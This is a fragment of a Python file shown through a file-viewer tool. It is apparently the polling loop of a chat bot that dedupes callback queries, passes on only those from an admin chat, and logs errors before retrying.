   983→  4482→                    
   984→  4483→                    # === منع تكرار معالجة نفس الـ callback ===
   985→  4484→                    cb_key = f"cb:{cb_id}"
   986→  4485→                    if cb_key in _processed_message_keys:
   987→  4486→                        continue
   988→  4487→                    _processed_message_keys.add(cb_key)
   989→  4488→                    
   990→  4489→                    if cb_chat != ADMIN_CHAT_ID:
   991→  4490→                        continue
   992→  4491→                    await handle_callback_query(cb)
   993→  4492→        
   994→  4493→        except asyncio.CancelledError:
   995→  4494→            break
   996→  4495→        except Exception as exc:
   997→  4496→            log.error("Poll error: %s", exc)
   998→  4497→            await asyncio.sleep(3)
   999→  4498→
  1000→  4499→# ============================================================================
  1001→
  1002→[showing lines 3500-4499 of 5555; use offset=4500 with limit to continue reading]